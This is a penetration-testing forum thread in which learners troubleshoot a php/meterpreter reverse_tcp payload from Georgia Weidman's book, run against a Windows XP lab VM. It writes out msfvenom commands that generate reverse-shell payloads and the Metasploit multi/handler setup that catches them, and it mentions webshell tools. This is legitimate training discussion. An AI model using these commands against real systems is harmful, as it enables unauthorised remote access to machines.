Georgia Weidman Chapter 8 – php/meterpreter/reverse_tcp with Kali 2016Penetration Testing

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATION
Already a Member Login Here

Home Forums Penetration Testing Georgia Weidman Chapter 8 – php/meterpreter/reverse_tcp with Kali 2016

This topic contains 8 replies, has 7 voices, and was last updated by  halfluke 1 year, 10 months ago.

Viewing 9 posts - 1 through 9 (of 9 total)
  • Author
    Posts
  • #54591

    crowbotham
    Participant

    I was wondering how many of you have tried to run the exploit php/meterpreter/reverse_tcp lately with the new Kali 2016 rolling.

    First off, to problem solve I did make sure the machine was completely dist-upgrade/update/upgrade and restarted the machine.

    In the chapter of Weidman’s book we are trying to take advantage of the Windows XP vm which is vulnerable to this exploit.

    The directions we follow are:

    To create payload:

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192…. LPORT=2323 -f raw > meterpreter.php

    This creates a payload that we can want the victim to execute.

    msfconsole
    use exploit multi/handler
    set payload php/meterpreter/reverse_tcp
    set LHOST 192…
    set LPORT 2323
    exploit

    On our vm of windows xp we open the meterpreter.php file

    Back in our Kali terminal we see that it recognized the vm opening the php file and get:
    [*] Meterpreter session 1 opened

    but then metasploit gives the error:
    Meterpreter session 1 closed. Reason: Died

    So I am hoping that someone can try this on the new Kali and see if they are getting the same result. I appreciate any advice or suggestions that you have.

    Thank you,
    crowbotham

    #55038

    ycisec
    Participant

    I don’t know if this will be much help or not, but I’ve seen this behavior in other courses I’ve taken (I’ve got Georgia’s book but haven’t gone through it all yet) and I’ve found the php/meterpreter/reverse_tcp payload to be unstable at times. I’ve also seen it die when the process on the victim machine I’ve exploited dies, so if I don’t migrate processes quickly I lose the shell.

    #55095

    crowbotham
    Participant

    Yeah I think what might be happening too is that the VM isn’t stable enough to keep the connection open. Could be that I do not have enough RAM or processing power but when I run the exploit against my Ubuntu box (non vm) it works so it must be some issue with the VM.

    Thanks for your reply though and I have tried to migrate process quick but still it doesn’t give me enough time to even hit enter for the migrate command to go through.

    Like I said though, I had on older desktop that I just threw Ubuntu on it and then ran the exploit and it worked.

    • This reply was modified 3 years, 6 months ago by  crowbotham.
    #63691

    iehov61
    Participant

    Hi, actually im running into the same issue. As soon as i get a php meterpreter session the session dies and exits. The issue is that im getting a partial meterpreter session, some commands like sysinfo are not available. If i retry like 10 times then i get a 10 extra seconds more stable session and some additional commands. What could be the issue? also when trying to run post exploitation modules with php meterpreter session i get tons on errors … Is this like an indentified bug or something?

    Any lights will be appretiated

    #70671

    breuermar
    Participant

    When I have to deal with meterpreter and PHP generated with msfvenom I have the same issue. Maybe try to migrate into another process when this is possible in the meterpreter session before it dies.
    When you are satisfied with a normal reverse shell you could use “weevely” tool in Kali to generate your own password protected shell.
    Kali comes with several webshells “/usr/share/webshells/”. The reverse shell from “Pentestmonkey” is fantastic.

    #98945

    dfc302
    Participant

    So its August of 2017, I know this post was posted a while back but I am currently going through this chapter at the moment having the exact same issues. However, you said your issue might not be enough ram, but I gave double the ram to the xp vm and I am still experiencing the issue. Has anyone resolved this yet? Or did you personally ever find a solution? Thanks

    #99056

    crowbotham
    Participant

    You know, I never solved it. I just moved on past it. Now knowing more about metasploit I would probably try to run the exploit with the -j tag which will background the session first. Don’t know if it will work but it’s worth a try. To be honest I skipped past it because I knew the theory behind it and could tell what it was supposed to do.

    Georgia’s book is all about learning the concepts and tools and with how quick those change it was good enough to understand what was trying to be accomplished.

    Good luck and I’m sorry I couldn’t be more help.

    #105890

    savvygeek
    Participant

    Exploit -j doesn’t have any effect on this. I’m using Kali 2017 v. 2 and I can’t get a stable Meterpreter session.

    I noticed she changes the command in the video and ends the command with a redirection (> meterpreter.php) instead of using -f raw as described in the book. Someone suggested this on Stack Overflow but it doesn’t solve the problem.

    • This reply was modified 1 year, 12 months ago by  savvygeek.
    • This reply was modified 1 year, 12 months ago by  savvygeek.
    • This reply was modified 1 year, 12 months ago by  savvygeek.
    • This reply was modified 1 year, 12 months ago by  savvygeek.
    #107801

    halfluke
    Participant

    EDIT:

    I have the same issue, and I’m annoyed because I *think* that it worked for me the first time I tried a couple of weeks ago, after following the videos and using exploit -j and ExitOnSession “false” . But perhaps it’s a retrospective illusion due to wishful thinking 🙂
    I get a “Meterpreter session 1 is not valid and will be closed” after 10-15 seconds whether I use a 2-stages php/meterpreter/reverse_tcp, or a 1-stage version php/meterpreter_reverse_tcp.
    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=2323 -f raw > meterpreter2stages.php + use multi/handler set payload php/meterpreter/reverse_tcp
    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.x.x LPORT=2323 -f raw > meterpreter1stage.php + use multi/handler set payload php/meterpreter_reverse_tcp
    No change if using -f raw, -o, or redirection with >
    Glad I’m not alone…

    • This reply was modified 1 year, 10 months ago by  halfluke. Reason: double-checled and fixed details
Viewing 9 posts - 1 through 9 (of 9 total)

You must be logged in to reply to this topic.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel